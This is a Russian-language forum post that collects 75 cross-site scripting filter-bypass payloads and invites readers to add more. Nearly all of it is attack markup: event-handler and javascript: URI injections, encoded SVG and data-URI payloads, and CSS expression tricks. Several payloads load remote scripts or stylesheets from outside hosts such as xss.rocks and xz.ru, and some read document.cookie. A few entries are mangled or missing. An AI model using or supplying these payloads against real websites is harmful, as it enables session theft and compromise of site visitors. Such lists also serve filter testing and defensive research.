Решил некоторые байпассы XSS фильтров собрать. И предлагаю дополнять эту тему.
Payload #1:
Payload #2:
Payload #3:
Payload #4:
Payload #5:
Payload #6:
Payload #7:
Payload #8:
Payload #9:
Payload #10:
Payload #11:
Payload #12:
Payload #13:
Payload #14:
Payload #15:
Payload #16:
Payload #17:
Payload #18:
Payload #19:
Payload #20:
Payload #21:
Payload #22:
Payload #23:
Payload #24:
Payload #25:
Payload #26:
Payload #27:
Payload #28:
Payload #29:
Payload #30:
Payload #32:
Payload #33:
Payload #34:
Payload #35:
Payload #36:
Payload #37:
Payload #38:
Payload #39:
Payload #40:
Payload #41:
Payload #42:
Payload #43:
Payload #44:
Payload #45:
Payload #46:
Payload #47:
Payload #48:
Payload #49:
Payload #50:
Payload #51:
Payload #52:
Payload #53:
Payload #54:
Payload #55:
Payload #56:
Payload #57:
Payload #58:
Payload #59:
Payload #60:
Payload #62:
Payload #63:
Payload #64:
Payload #65:
Payload #66:
Payload #67:
Payload #68:
Payload #69:
Payload #70:
Payload #71:
Payload #72:
Payload #73:
Payload #74:
Payload #75:
Payload #1:
Код:
<svg xml:base="data:image/svg+xml;base64,
PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cD
ovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhs
aW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW
5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3
JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0i
NTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZW
RFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8x
OTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dH
A6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0i
amF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQ
ogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+">
<use xlink:href="#rectangle" />
</svg>
Payload #2:
Код:
<svg>
<a href>
<animate attributeName="href" from="javascript:alert(1)" to="javascript:alert(1)" ></animate>
<circle r=50></circle>
</a>
</svg>
Payload #3:
Код:
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
Payload #4:
Код:
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)> <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script> <script>alert(document.cookie)</script>"> <img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'"> <img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg">
Payload #5:
Код:
<IMG SRC="javascript:alert('XSS');">
Payload #6:
Код:
<IMG SRC=javascript:alert('XSS')>
Payload #7:
Код:
<IMG SRC=JaVaScRiPt:alert('XSS')>
Payload #8:
Код:
<IMG SRC=javascript:alert("XSS")>
Payload #9:
Код:
<IMG SRC=`javascript:alert("XSS")`>
Payload #10:
Код:
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Payload #11:
Код:
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Payload #12:
Код:
<IMG SRC=# onmouseover="alert('xxs')">
Payload #13:
Код:
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
Payload #14:
Код:
<img src=x onerror="javascript:alert('XSS')">
Payload #15:
Код:
<IMG SRC=javascript:alert( 'XSS')>
Payload #16:
Код:
<IMG SRC=javascript:a& #0000108ert('XSS')>
Payload #17:
Код:
<IMG SRC=javascript:alert('XSS')>
Payload #18:
Код:
<IMG SRC="jav ascript:alert('XSS');">
Payload #19:
Код:
<IMG SRC="jav ascript:alert('XSS');">
Payload #20:
Код:
<IMG SRC="jav
ascript:alert('XSS');">
Payload #21:
Код:
jav
ascript:alert('XSS');
Payload #22:
Код:
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Payload #23:
Код:
<<SCRIPT>alert("XSS");//<</SCRIPT>
Payload #24:
Код:
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
Payload #25:
Код:
<IMG SRC="javascript:alert('XSS')"
Payload #26:
Код:
<iframe src=http://xz.ru:1337/scriptlet.html <
Payload #27:
Код:
<BODY BACKGROUND="javascript:alert('XSS')">
Payload #28:
Код:
<IMG DYNSRC="javascript:alert('XSS')">
Payload #29:
Код:
<IMG LOWSRC="javascript:alert('XSS')">
Payload #30:
Код:
<style>li {list-style-image: url("javascript:alert('XSS')");}</style><UL><LI>XSS</br>
Payload #32:
Код:
<BGSOUND SRC="javascript:alert('XSS');">
Payload #33:
Код:
<BR SIZE="&{alert('XSS')}">
Payload #34:
Код:
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Payload #35:
Код:
<LINK REL="stylesheet" HREF="http://xz.ru:1337/xss.css">
Payload #36:
Код:
<STYLE>@import'http://xz.ru:1337/xss.css';</STYLE>
Payload #37:
Код:
<META HTTP-EQUIV="Link" Content="<http://xz.ru:1337/xss.css>; REL=stylesheet">
Payload #38:
Код:
<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>
Payload #39:
Код:
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
Payload #40:
Код:
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
Payload #41:
Код:
exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
Payload #42:
Код:
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
Payload #43:
Код:
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
Payload #44:
Код:
¼script¾alert(¢XSS¢)¼/script¾
Payload #45:
Код:
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
Payload #46:
Код:
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
Payload #47:
Код:
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Payload #48:
Код:
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
Payload #49:
Код:
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
Payload #50:
Код:
<TABLE BACKGROUND="javascript:alert('XSS')">
Payload #51:
Код:
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
Payload #52:
Код:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Payload #53:
Код:
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
Payload #54:
Код:
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
Payload #55:
Код:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Payload #56:
Код:
<DIV STYLE="width: expression(alert('XSS'));">
Payload #57:
Код:
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
Payload #58:
Код:
<BASE HREF="javascript:alert('XSS');//">
Payload #59:
Код:
<OBJECT TYPE="text/x-scriptlet" DATA="http://xz.ru:1337/scriptlet.html"></OBJECT>
Payload #60:
Код:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Payload #62:
Код:
<HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY></HTML>
Payload #63:
Код:
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Payload #64:
Код:
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
Payload #65:
Код:
<input onfocus=write(1) autofocus>
Payload #66:
Код:
<video poster=javascript:alert(1)//></video>
Payload #67:
Код:
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
Payload #68:
Код:
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
Payload #69:
Код:
<video><source onerror="alert(1)">
Payload #70:
Код:
<iframe srcdoc="<img src=x:x onerror=alert(1)>" />
Payload #71:
Код:
<picture><source srcset="x"><img onerror="alert(1)"></picture>
Payload #72:
Код:
<iframe srcdoc="<svg onload=alert(1)>⃒"></iframe>
Payload #73:
Код:
<details open ontoggle="alert(1)">
Payload #74:
Код:
<img[a]src=x[d]onerror[c]=[e]"alert(1)">
Payload #75:
Код:
<tagname someattribute1=value onSomeEvent="var x=10;alert(x); ">